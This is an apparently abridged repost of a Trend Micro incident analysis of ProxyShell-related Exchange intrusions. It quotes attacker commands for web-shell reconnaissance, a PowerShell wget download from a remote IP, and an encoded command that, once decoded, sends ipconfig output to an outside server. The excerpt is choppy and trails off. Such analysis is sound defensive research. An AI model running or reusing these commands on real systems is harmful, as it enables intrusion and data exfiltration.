Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR

Trend Micro -

Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).

Incident # 2

Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.

Our analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don’t have information as to what was downloaded since the URL was already dead by the time of analysis.

“C:WindowsSystem32cmd.exe” /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK

The following commands were executed in order to gather basic system information:

cmd.exe /c ipconfig cmd.exe /c dir “c:windowssystem32cmd.exe” /c ping -n 1 google.com “c:windowssystem32cmd.exe” /c whoami

The web shell was then copied and the original entry deleted using the following commands:

cmd.exe /c ren C:inetpubwwwrootaspnet_clienterrorFF.aspx.req errorFF.aspx “c:windowssystem32cmd.exe” /c del “C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaautherrorFF.aspx.req”

The ipconfig command was executed as an argument for a wget request.

The following code shows the Powershell-encoded (top) and decoded (bottom) commands:

“c:windowssystem32cmd.exe” /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA

$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType “application/octet-stream”

Mimikatz,

Read More: https://www.trendmicro.com/en_us/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html